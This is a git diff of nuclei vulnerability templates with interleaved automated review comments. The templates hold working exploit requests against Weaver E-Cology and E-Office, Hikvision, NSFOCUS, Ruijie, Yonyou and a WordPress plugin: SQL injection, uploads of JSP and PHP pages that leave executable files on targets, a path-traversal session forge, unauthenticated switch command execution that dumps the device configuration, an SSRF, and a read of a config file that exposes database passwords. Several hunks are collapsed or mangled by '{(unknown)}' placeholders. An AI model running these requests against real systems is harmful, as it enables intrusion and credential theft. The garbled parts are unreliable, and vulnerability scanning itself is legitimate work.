+id: weaver-ecology-getsqldata-sqli
+
+info:
+  name: Weaver E-Cology `getsqldata` - SQL Injection
+  author: SleepingBag945
+  severity: high
+  description: |
+    When the getSqlData interface of the Panwei e-cology OA system uses the mssql database, the built-in SQL statements are not spliced strictly, resulting in a SQL injection vulnerability.
+  reference:
+    - https://github.com/Wrin9/weaverOA_sql_RCE/blob/14cca7a6da7a4a81e7c7a7016cb0da75b8b290bc/weaverOA_sql_injection_POC_EXP.py#L46
+  metadata:
+    verified: true
+    max-request: 2
+    shodan-query: ecology_JSessionid
+    fofa-query: app="泛微-协同办公OA"
+  tags: ecology,weaver,oa,sqli
+variables:
+  num: "999999999"
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=select%20substring(sys.fn_sqlvarbasetostr(hashbytes('MD5','{{num}}')),3,32)"
+      - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql="
+
+    stop-at-first-match: true
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5(num)}}'
+
+      - type: word
+        part: body
+        words:
+          - '{"api_status":'
+          - '"status":true}'
+        condition: and
+
+# digest: 490a00463044022030ad64fd9961684672663bf926bddb0391c94c7fdc8811b4fade9b5f2a1f908b022006c35ef700880eefd6d5e1e757558e4ca0cb156164165191be70c8bec7479fdf:922c64590222798bb761d5b6d8e72950
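Review bot: The oracle on L1494 uses `sys.fn_sqlvarbasetostr` and `hashbytes`, and the description on L1479 correctly limits the check to MSSQL backends, but on any other backend that request errors and the empty-`sql=` fallback on L1495 is still sent — if the endpoint answers an empty statement with `"status":true`, the unnamed second matcher on L1504–L1509 reports a hit with no proof that attacker SQL ran. Name the matchers (`name: mssql-oracle`, `name: endpoint-reachable`) so output distinguishes the two, and mention in the description that a fallback-only hit means the API is exposed rather than confirmed injectable. This is a verbatim copy of `poc/sql/weaver-ecology-getsqldata-sqli.yaml` added in the same commit.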
diff --git a/poc/sql_injection/weaver-ecology-hrmcareer-sqli.yaml b/poc/sql_injection/weaver-ecology-hrmcareer-sqli.yaml
new file mode 100755
index 0000000000..92cef0c85e
--- /dev/null
+++ b/poc/sql_injection/weaver-ecology-hrmcareer-sqli.yaml
@@ -0,0 +1,36 @@
+id: weaver-ecology-hrmcareer-sqli
+
+info:
+  name: Weaver E-Cology HrmCareerApplyPerView - SQL Injection
+  author: SleepingBag945
+  severity: high
+  description: |
+    There is a SQL injection vulnerability in the HrmCareerApplyPerView.jsp file of Panwei OA E-Cology. An attacker can obtain sensitive files in the server database through the vulnerability.
+  reference:
+    - https://github.com/ibaiw/2023Hvv/blob/556de69ffc370fd9827e2cf5027373543e2513d4/%E6%B3%9B%E5%BE%AE%20HrmCareerApplyPerView%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md?plain=1#L3
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: ecology_JSessionid
+    fofa-query: app="泛微-协同办公OA"
+  tags: ecology,weaver,oa,sqli
+variables:
+  num: "999999999"
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes('MD5','{{num}}')),4,5,6,7"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5(num)}}'
+
+      - type: status
+        status:
+          - 200
+
+# digest: 4a0a004730450221008a69da6dd9b0443019eb595747f9261d574b5a66de842c6185e142a5283fac49022003c7581a2daeebea8bd4eb05c1fc91f8676c9a2a46da1bc7b1e0717fa27fbca8:922c64590222798bb761d5b6d8e72950
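Review bot: The oracle value `num: "999999999"` on L1535 is constant, so the MD5 string the matcher on L1547 looks for is identical on every run; a cached or replayed response produces a false positive, and a WAF signature written against this exact payload produces false negatives. nuclei variables accept helper functions, so `num: "{{rand_int(100000000, 999999999)}}"` keeps the `{{md5(num)}}` matcher working while making each probe unique. The union on L1540 also hard-codes seven columns; if other E-Cology versions differ in column count (I cannot confirm from the reference), the query errors and the template misses them. This file duplicates `poc/sql/weaver-ecology-hrmcareer-sqli.yaml` from the same commit.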
diff --git a/poc/sql_injection/weaver-mysql-config-info-leak.yaml b/poc/sql_injection/weaver-mysql-config-info-leak.yaml
new file mode 100644
index 0000000000..85dad0d119
--- /dev/null
+++ b/poc/sql_injection/weaver-mysql-config-info-leak.yaml
@@ -0,0 +1,30 @@
+id: weaver-mysql-config-exposure
+
+info:
+  name: OA E-Office mysql_config.ini - Information Disclosure
+  author: SleepingBag945
+  severity: high
+  description: |
+    E-Office mysql_config.ini file can be directly accessed, leaking database account password and other information
+  reference:
+    - https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E6%B3%9B%E5%BE%AEOA%20E-Office%20mysql_config.ini%20%E6%95%B0%E6%8D%AE%E5%BA%93%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: app="泛微-EOffice"
+  tags: ecology,weaver,oa,lfi
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/mysql_config.ini"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(header,"text/plain")'
+          - 'contains_all(body,"datapassword", "datauser")'
+        condition: and
+
+# digest: 4a0a00473045022003d14acb438bcd3ddfaab392c67ae2d0fd30ddbe80da964d403b0403eee025dd022100d6c9d8d5b6864cd317a1b28d3c9a5eeb35e4a0bbfb64a43f01c526d2a5e63070:922c64590222798bb761d5b6d8e72950
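Review bot: The `id` on L1560 is `weaver-mysql-config-exposure` while the file is named `weaver-mysql-config-info-leak.yaml`; the nuclei-templates checker expects the two to agree, and the mismatch makes `-id`-based filtering confusing. Rename the file to `weaver-mysql-config-exposure.yaml` (and drop the duplicate under `poc/sql/`). The `lfi` tag on L1574 is wrong for a directly readable config file — `exposure,config` matches what the GET on L1579 and the `datapassword`/`datauser` check on L1586 actually demonstrate.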
diff --git a/poc/ssrf/office-webapps-ssrf.yaml b/poc/ssrf/office-webapps-ssrf.yaml
index 85231b0f37..dd69b267b1 100644
--- a/poc/ssrf/office-webapps-ssrf.yaml
+++ b/poc/ssrf/office-webapps-ssrf.yaml
@@ -4,6 +4,7 @@ info:
   name: Office Web Apps Server Full Read - Server Side Request Forgery
   author: DhiyaneshDK
   severity: high
+  description: Office Web Apps Server Full Read is vulnerable to SSRF.
   reference:
     - https://drive.google.com/file/d/1aeNq_5wVwHRR1np1jIRQM1hocrgcZ6Qu/view (Slide 37,38)
   metadata:
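Review bot: The description added on L1598, `Office Web Apps Server Full Read is vulnerable to SSRF.`, treats `Full Read` as part of the product name and says nothing a reader cannot get from `name`. Describe the behaviour the request exercises, e.g. `The WOPI endpoint fetches an attacker-supplied wFileId URL, follows redirects and returns the fetched content to the caller, giving a full-read server-side request forgery against internal hosts.` The request that demonstrates this is in the next hunk.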
@@ -19,7 +20,7 @@ variables:
 http:
   - raw:
       - |
-        GET /oh/wopi/files/@/wFileId/contents?wFileId=http://{{oast}}/{{string}}.xlsx%3fbody={{string}}%26header=Location:http://oast.pro%26status=302&access_token_ttl=0 HTTP/1.1
+        GET /oh/wopi/files/@/wFileId/contents?wFileId=http://{{oast}}/{{string}}.xlsx%3fbody={{string}}%26header=Location:http://{{oast}}%26status=302&access_token_ttl=0 HTTP/1.1
         Host: {{Hostname}}
 
     matchers:
@@ -29,5 +30,4 @@ http:
           - contains(body,'

Interactsh Server

')
           - status_code == 200
         condition: and
-
-# digest: 4a0a0047304502207e37c166b7939e67027a532a414b3ed954332b97d7a1ba9c8bc3ccf98c206614022100ba38deb6e2059ad4b76f56fae8b4f0accce143472e8c236e297c90365c1306c7:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100cbf861ff659932311fdb82c1a1d21e84d62817b2c805bc12eaacfdc5501c384a022061b6723822f822862e2d6b48259339781dcca9bd883f6502676870b3a14a1f26:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/upload/Hikvision_iVMS-8700_upload_action.yaml b/poc/upload/Hikvision_iVMS-8700_upload_action.yaml
index 7f081b05e0..7e328a8b1b 100644
--- a/poc/upload/Hikvision_iVMS-8700_upload_action.yaml
+++ b/poc/upload/Hikvision_iVMS-8700_upload_action.yaml
@@ -1,48 +1,50 @@ id: HIKVISION info: - name: HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 upload Webshell file - author: Zero Trust Security Attack and Defense Laboratory + name: HHIKVISION iVMS-8700 upload Webshell file + author: zerZero Trust Security Attack and Defense Laboratory severity: high description: | - HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 There is an arbitrary file upload vulnerability where attackers can control the server by sending specific request packets to upload Webshell files + HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file metadata: fofa-query: icon_hash="-911494769" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" variables: - str1: '{{rand_base(6)}}' - str2: '{{rand_base(6)}}' - str3: '<%out.print("{{str2}}");%>' + str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding' http: - raw: - | - POST /eps/resourceOperations/upload.action HTTP/1.1 + POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1 Host: {{Hostname}} - User-Agent: MicroMessenger - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTJyhtTNqdMNLZLhj - - ------WebKitFormBoundaryTJyhtTNqdMNLZLhj - Content-Disposition: form-data; name="fileUploader";filename="{{str1}}.jsp" + User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: close + Content-Length: 184 + Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15 + + --c4155aff43901a8b2a19a4641a5efa15 + Content-Disposition: form-data; name="fileUploader"; filename="test.jsp" Content-Type: image/jpeg - {{str3}} - ------WebKitFormBoundaryTJyhtTNqdMNLZLhj-- + {{randstr}} + --c4155aff43901a8b2a19a4641a5efa15-- - | - GET /eps/upload/{{res_id}}.jsp HTTP/1.1 + GET /eps/upload/{{name}}.jsp HTTP/1.1 Host: {{Hostname}} extractors: - type: json - name: res_id + name: name json: - 
".data.resourceUuid" internal: true matchers: - - type: dsl - dsl: - - body_2 == str2 + - type: word + words: + - '{{randstr}}' diff --git a/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml b/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml index 1cd783867f..a8f9cbe173 100644 --- a/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml +++ b/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml 
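Review bot: The rewritten `info` block introduces typos that look accidental — `name: HHIKVISION iVMS-8700 …`, `author: zerZero Trust …` and `Platfor` in the description — while the new request hard-codes `Content-Length: 184` above a multipart body whose content is `{{randstr}}`; unless nuclei recomputes the header for raw requests (I could not confirm that here), a wrong length truncates or stalls the upload. Drop the explicit `Content-Length` line and fix the names (`name: HIKVISION iVMS-8700 - Arbitrary File Upload`, `author: Zero Trust Security Attack and Defense Laboratory`). The new matcher `words: - '{{randstr}}'` is no longer scoped to the second response, so if the upload response echoes the submitted content it would match before the JSP is ever fetched; keep it as `part: body_2`. This hunk is collapsed in the rendering, so positions are given by content.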
@@ -1,28 +1,59 @@ id: Green-Alliance info: - name: Green Alliance SAS Fortress GetFile Arbitrary File Read Vulnerability + name: Green Alliance NF Next Generation Firewall Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory - severity: medium + severity: high description: | - There is an arbitrary user login vulnerability in the Green Alliance Fortress machine, which allows attackers to exploit vulnerabilities including www/local_ User. php enables any user to log in + Green Alliance SSL VPN has an arbitrary file upload vulnerability, allowing attackers to obtain server privileges and execute remote commands by sending special request packets metadata: - fofa-query: body="'/needUsbkey.php?username='" - hunter-query: web.body="'/needUsbkey.php?username='" + fofa-query: app="NSFOCUS-下一代防火墙" + hunter-query: web.title="用户认证 - NSFOCUS NF" + http: - - method: GET - path: - - "{{BaseURL}}/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd" + - raw: + - | + POST /api/v1/device/bugsInfo HTTP/1.1 + Host: {{Host}}:8081 + Content-Type: multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9 + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 + Content-Length: 238 + Accept-Encoding: gzip, deflate + Connection: close + + --1d52ba2a11ad8a915eddab1a0e85acd9 + Content-Disposition: form-data; name="file"; filename="sess_82c13f359d0dd8f51c29d658a9c8ac72" + + lang|s:52:"../../../../../../../../../../../../../../../../tmp/"; + --1d52ba2a11ad8a915eddab1a0e85acd9-- + + - | + POST /api/v1/device/bugsInfo HTTP/1.1 + Host: {{Host}}:8081 + Content-Type: multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 + Content-Length: 217 + Accept-Encoding: gzip, deflate + Connection: close + + 
--4803b59d015026999b45993b1245f0ef + Content-Disposition: form-data; name="file"; filename="compose.php" + + + --4803b59d015026999b45993b1245f0ef-- + + - | + GET /mail/include/header_main.php HTTP/1.1 + Host: {{Host}}:4433 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 + Cookie: PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac72 - matchers-condition: and matchers: - - type: word - part: body - words: - - "nologin" - - - type: status - status: - - 200 + - type: dsl + dsl: + - "status_code_1 == 200 && contains(body_1, 'upload file success')" + - "status_code_2 == 200 && contains(body_2, 'upload file success')" + - "status_code_3 == 200 && contains(body_3, '{{randstr}}')" + condition: and diff --git a/poc/upload/Ruijie_NBR_Router_fileupload.yaml b/poc/upload/Ruijie_NBR_Router_fileupload.yaml index fa762ac2f6..f2db119795 100644 --- a/poc/upload/Ruijie_NBR_Router_fileupload.yaml +++ b/poc/upload/Ruijie_NBR_Router_fileupload.yaml 
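Review bot: The final DSL requires `contains(body_3, '{{randstr}}')`, but no request in the hunk contains `{{randstr}}` — the `compose.php` upload body is empty as rendered — so either the PHP payload was lost in this view (plausible, since a `<?php … ?>` block would be stripped) or the match can never succeed; please verify the raw file. The chain writes a forged `sess_…` file carrying a serialized path-traversal `lang` value and then a PHP file onto the appliance, which is exploitation rather than detection and should carry an `intrusive` tag plus a cleanup note in the description. The `id` is still `Green-Alliance` and the description says `SSL VPN` while the file, name and `hunter-query` now describe the NF firewall, and the `Host: {{Host}}:8081` / `:4433` lines pin ports that a proxied or re-mapped target will not have. This hunk is collapsed in the rendering, so positions are given by content.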
@@ -1,37 +1,33 @@ id: Ruijie info: - name: Ruijie NBR Router fileupload.php Arbitrary File Upload Vulnerability + name: Ruijie Switch WEB Management System EXCU_ SHELL author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - Ruijie NBR router has an arbitrary file upload vulnerability in the fileupload.php file, which allows attackers to upload arbitrary files to the server and obtain server privileges + Ruijie Switch WEB Management System EXCU_ SHELL metadata: - fofa-query: app="Ruijie-NBR路由器" - hunter-query: web.title="锐捷网络 --NBR路由器--登录界面" + fofa-query: body="img/free_login_ge.gif" && body="./img/login_bg.gif" + hunter-query: web.body="img/free_login_ge.gif"&&body="./img/login_bg.gif" http: - raw: - | - POST /ddi/server/fileupload.php?uploadDir=../../321&name=test.php HTTP/1.1 + GET /EXCU_SHELL HTTP/1.1 Host: {{Hostname}} - Accept: text/plain, */*; q=0.01 - Content-Disposition: form-data; name="file"; filename="111.php" - Content-Type: image/jpeg + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.2852.74 Safari/537.36 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: close + Cmdnum: '1' + Command1: show running-config + Confirm1: n - - - | - GET /321/test.php HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 - req-condition: true matchers: - type: dsl dsl: - 'status_code_1 == 200' - - 'status_code_2 == 200' - - 'contains(body_1, "test.php")' - - 'contains(body_2, "PHP Version")' + - 'contains(body_1, "configuration")' condition: and diff --git a/poc/upload/weaver-eoffice-file-upload.yaml b/poc/upload/weaver-eoffice-file-upload.yaml new file mode 100644 index 0000000000..40adea2e05 --- /dev/null +++ b/poc/upload/weaver-eoffice-file-upload.yaml 
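Review bot: The file still named `Ruijie_NBR_Router_fileupload.yaml` with `id: Ruijie` now holds an unrelated check (switch web console `EXCU_SHELL` unauthenticated command execution), and the description merely repeats the `name`; rename file and id to match and describe the bug, e.g. `The switch web console's EXCU_SHELL endpoint executes CLI commands supplied in Cmdnum/CommandN request headers without authentication.` The request sends `Cmdnum: '1'` — in a raw HTTP header those quotes are transmitted literally, which I do not believe the handler expects; use `Cmdnum: 1` unless the quotes are deliberate. `show running-config` also pulls the entire device configuration, credentials included, onto the scanner, whereas a benign command such as `show version` with a matching body check proves execution with far less exposure. This hunk is collapsed in the rendering, so positions are given by content.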
@@ -0,0 +1,61 @@
+id: weaver-eoffice-file-upload
+
+info:
+ name: Weaver E-Office v9.5 - Arbitrary File Upload
+ author: princechaddha
+ severity: high
+ description: |
+ Weaver E-Office version 9.5 is susceptible to an arbitrary file upload vulnerability. This flaw allows malicious actors to upload and execute arbitrary code or files without proper validation or authorization.
+ reference:
+ - https://github.com/RCEraser/cve/blob/main/Weaver.md
+ metadata:
+ verified: true
+ max-request: 2
+ fofa-query: app="泛微-EOffice"
+ tags: e-office,weaver,intrusive,file-upload
+variables:
+ filename: '{{rand_base(7, "abc")}}'
+
+http:
+ - raw:
+ - |
+ POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{BaseURL}}
+ Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
+
+ ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
+ Content-Disposition: form-data; name="upload_quwan"; filename="{(unknown)}.phP"
+ Content-Type: image/jpeg
+
+ {{randstr}}
+ ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
+ Content-Disposition: form-data; name="file"; filename=""
+ Content-Type: application/octet-stream
+
+
+ ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--
+ - |
+ GET /attachment/{{id}}/{(unknown)}.phP HTTP/1.1
+ Host: {{Hostname}}
+
+ host-redirects: true
+ max-redirects: 2
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body_2
+ words:
+ - '{{randstr}}'
+
+ extractors:
+ - type: regex
+ name: id
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - '\\\/attachment\\\/([0-9]+)\\\/'
+
+# digest: 4b0a00483046022100cb2ea659985e0e6a70be38ce3127d612a7bb63b072df2cb43e4efe695bd304b0022100d305f452c2f830e004937b472bc867c5d0e8feab8e0846a113a5d8a5e163c33b:922c64590222798bb761d5b6d8e72950
diff --git a/poc/upload/weaver-ktreeuploadaction-file-upload.yaml b/poc/upload/weaver-ktreeuploadaction-file-upload.yaml
new file mode 100755
index 0000000000..04c63cc834
--- /dev/null
+++ b/poc/upload/weaver-ktreeuploadaction-file-upload.yaml
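Review bot: The `filename` variable declared under `variables:` is never referenced; both the multipart `filename="{(unknown)}.phP"` and the follow-up `GET /attachment/{{id}}/{(unknown)}.phP` carry a literal `{(unknown)}` that looks like a mangled `{{filename}}` reference (at least as rendered here), so the second request would ask for a file that was never uploaded and the template can never match. The same placeholder appears in the KtreeUploadAction hunk (`GET {(unknown)} HTTP/1.1`, where the extractor is named `filename`), the uploaderOperate hunk (`{(unknown)}.jsp`) and both wp-gallery copies (`{(unknown)}.png`). Restoring `filename="{{filename}}.phP"` and `GET /attachment/{{id}}/{{filename}}.phP HTTP/1.1` makes the two requests agree. Nothing removes the uploaded `.phP` file afterwards, so every positive result leaves a file under `/attachment/`; the description should say so since the `intrusive` tag alone does not.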
@@ -0,0 +1,57 @@
+id: weaver-ktreeuploadaction-file-upload
+
+info:
+ name: Weaver E-Cology KtreeUploadAction - Arbitrary File Upload
+ author: SleepingBag945
+ severity: critical
+ description: |
+ There is a file upload vulnerability in Weaver E-Cology. An attacker can upload any file through KtreeUploadAction.jsp and further exploit it.
+ reference:
+ - https://buaq.net/go-117479.html
+ metadata:
+ verified: true
+ max-request: 2
+ shodan-query: ecology_JSessionid
+ fofa-query: app="泛微-协同办公OA"
+ tags: weaver,ecology,fileupload,intrusive
+variables:
+ num1: "{{rand_int(40000, 50000)}}"
+ num2: "{{rand_int(40000, 50000)}}"
+ result: "{{to_number(num1)*to_number(num2)}}"
+
+http:
+ - raw:
+ - |
+ @timeout: 20s
+ POST /weaver/com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction?action=image HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywgljfvib
+
+ ------WebKitFormBoundarywgljfvib
+ Content-Disposition: form-data; name="test"; filename="{{randstr}}.jsp"
+ Content-Type: image/jpeg
+
+ <%out.print({{num1}} * {{num2}});new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
+ ------WebKitFormBoundarywgljfvib--
+ - |
+ @timeout: 20s
+ GET {(unknown)} HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: dsl
+ dsl:
+ - "status_code_1 == 200 && contains_all(body_1,'original', 'SUCCESS')"
+ - "contains(body_2, '{{result}}') && status_code_2 == 200"
+ condition: and
+
+ extractors:
+ - type: regex
+ name: filename
+ group: 1
+ regex:
+ - "','url':'(.*?)','title"
+ internal: true
+
+# digest: 490a0046304402203845240787e3da61949c359ff2e44cc0797d850f8aa35cbf4e8a9cb052a3bb5b022003685a977b9463c7de0e27f8227f54e5559e6dc17663eb17c1f35122ea4a7f24:922c64590222798bb761d5b6d8e72950
diff --git a/poc/upload/weaver-uploadoperation-file-upload.yaml b/poc/upload/weaver-uploadoperation-file-upload.yaml
new file mode 100755
index 0000000000..b3e4dd4341
--- /dev/null
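Review bot: `matchers-condition: and` is redundant here: there is a single `dsl` matcher whose two expressions are already joined by `condition: and`. The extractor names no `part:`, so which response the `','url':'(.*?)','title` regex is applied to is left to the engine default; pinning it with `part: body_1` documents the intent and mirrors the `body_1`/`body_2` used in the matcher. The `info` block gives no affected-version range and no `remediation`, unlike the wp-gallery template in this same commit (`remediation: Fixed in version 3.1.1`); if the referenced write-up names a fixed release, recording it lets triage separate patched from unpatched hosts.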
+++ b/poc/upload/weaver-uploadoperation-file-upload.yaml 
@@ -0,0 +1,77 @@
+id: weaver-uploadoperation-file-upload
+
+info:
+ name: Weaver OA Workrelate - Arbitary File Upload
+ author: SleepingBag945
+ severity: critical
+ description: |
+ Ecology contains an arbitrary file upload vulnerability. An attacker can upload arbitrary files to the server, which in turn can be used to make the application execute file content as code, As a result, an attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+ reference:
+ - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
+ - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/weaver-oa-workrelate-file-upload.yaml
+ metadata:
+ max-request: 3
+ fofa-query: app="泛微-协同办公OA"
+ tags: ecology,fileupload,intrusive
+variables:
+ filename: "{{to_lower(rand_base(5))}}"
+ string: "{{randstr}}"
+
+http:
+ - raw:
+ - |
+ POST /workrelate/plan/util/uploaderOperate.jsp HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
+ Accept: */*
+ Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVdb2RRl25PuaGhWj
+ Accept-Encoding: gzip
+
+ ------WebKitFormBoundaryVdb2RRl25PuaGhWj
+ Content-Disposition: form-data; name="secId"
+
+ 1
+ ------WebKitFormBoundaryVdb2RRl25PuaGhWj
+ Content-Disposition: form-data; name="Filedata"; filename="{(unknown)}.jsp"
+
+ <%out.println("{{string}}");%>
+ ------WebKitFormBoundaryVdb2RRl25PuaGhWj
+ Content-Disposition: form-data; name="plandetailid"
+
+ 1
+ ------WebKitFormBoundaryVdb2RRl25PuaGhWj--
+ - |
+ POST /OfficeServer HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
+ Accept: */*
+ Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVdb2RRl25PuaGhWj
+ Accept-Encoding: gzip
+
+ ------WebKitFormBoundaryVdb2RRl25PuaGhWj
+ Content-Disposition: form-data; name="aaa"
+
+ {"OPTION":"INSERTIMAGE","isInsertImageNew":"1","imagefileid4pic":"{{fileid}}"}
+ ------WebKitFormBoundaryVdb2RRl25PuaGhWj--
+ - |
+ GET /{(unknown)}.jsp HTTP/1.1
+ Host: {{Hostname}}
+
+ extractors:
+ - type: regex
+ name: fileid
+ internal: true
+ group: 1
+ regex:
+ - "&fileid=(.*?)\\'>"
+
+ matchers-condition: and
+ matchers:
+ - type: dsl
+ dsl:
+ - "status_code_1 == 200 && contains(body_1,'workrelate/plan/util/ViewDoc')"
+ - "status_code_2 == 200 && contains(body_2, 'println')"
+ - "status_code_3 == 200 && contains(body_3,'{{string}}')"
+ condition: and
+
+# digest: 4a0a00473045022100842d0c47c12fe663e3da34832c889d568c8fffb3740648bbccc968954dd1c6e40220140f9f9b1d82e205c7bbcb715d2bfb99c4513d6cc842990a9618fd21e4c97721:922c64590222798bb761d5b6d8e72950
diff --git a/poc/upload/wp-gallery-file-upload.yaml b/poc/upload/wp-gallery-file-upload.yaml
new file mode 100644
index 0000000000..1459b7f9ce
--- /dev/null
+++ b/poc/upload/wp-gallery-file-upload.yaml
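Review bot: The JSP uploaded by the first request (`<%out.println("{{string}}");%>`) is left on the target after the third request confirms it: nothing deletes it, whereas the KtreeUploadAction template in this same commit has its page remove itself after printing. Either adopt the same self-removal or state in the description that a positive result leaves a server-side script in the web root that must be cleaned up manually. `matchers-condition: and` is redundant with a single `dsl` matcher that already has `condition: and`. The `name` misspells "Arbitrary" as `Arbitary`.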
@@ -0,0 +1,48 @@
+id: wp-gallery-file-upload
+
+info:
+ name: WordPress Plugin Gallery 3.06 - Arbitrary File Upload
+ author: r3Y3r53
+ severity: high
+ description: |
+ The Gallery by BestWebSoft WordPress plugin was affected by an Unauthenticated File Upload PHP Code Execution security vulnerability.
+ remediation: Fixed in version 3.1.1
+ reference:
+ - https://www.exploit-db.com/exploits/18998
+ - http://wordpress.org/extend/plugins/gallery-plugin/
+ - http://downloads.wordpress.org/plugin/gallery-plugin.3.06.zip
+ - https://wpscan.com/vulnerability/049c8518-1f52-4aa4-b0b3-218289727353
+ metadata:
+ verified: true
+ max-request: 2
+ publicwww-query: /wp-content/plugins/gallery-plugin/
+ google-query: inurl:/wp-content/plugins/gallery-plugin/
+ tags: wp,wp-plugin,wordpress,wpscan,file-upload,intrusive
+variables:
+ filename: "{{to_lower(rand_text_alpha(5))}}"
+
+http:
+ - raw:
+ - |
+ POST /wp-content/plugins/gallery-plugin/upload/php.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: multipart/form-data; boundary=WebKitFormBoundary20kgW2hEKYaeF5iP
+
+ --WebKitFormBoundary20kgW2hEKYaeF5iP
+ Content-Disposition: form-data; name="qqfile"; filename="{(unknown)}.png"
+
+ {{randstr}}
+
+ --WebKitFormBoundary20kgW2hEKYaeF5iP--
+ - |
+ GET /wp-content/plugins/gallery-plugin/upload/files/{(unknown)}.png HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(content_type_1, "text/html") && contains(content_type_2, "image/png")'
+ - 'contains(body_1, "success:true") && contains(body_2, "{{randstr}}")'
+ condition: and
+
+# digest: 4a0a0047304502202a745722b545793e04182b1db3e42251980ddd30a3bf2d24a01e66f5835d48c3022100a51cc6736be76c352b14ba34112aee6f4c91b99534d7c684bb5a22aa8538f467:922c64590222798bb761d5b6d8e72950
diff --git a/poc/upload/yonyou-nc-dispatcher-fileupload.yaml b/poc/upload/yonyou-nc-dispatcher-fileupload.yaml
new file mode 100755
index 0000000000..374ae31b0d
--- /dev/null
+++ b/poc/upload/yonyou-nc-dispatcher-fileupload.yaml
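Review bot: This file is added a second time in the same commit as `poc/wordpress/wp-gallery-file-upload.yaml` with the identical blob `1459b7f9ce` and the identical `# digest:` line, so a run over the whole repository uploads twice to every host and the two copies will diverge at the next edit. Keep one copy (or make one a symlink if the layout needs both paths). The uploaded `.png` is also never removed afterwards; the description could note that a positive result leaves a file under `upload/files/`.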
@@ -0,0 +1,38 @@
+id: yonyou-nc-dispatcher-fileupload
+
+info:
+ name: Yonyou NC ServiceDispatcher Servlet - Arbitrary File Upload
+ author: SleepingBag945
+ severity: critical
+ description: |
+ Yonyou NC ServiceDispatcherServlet deserialization file upload vulnerability.
+ reference:
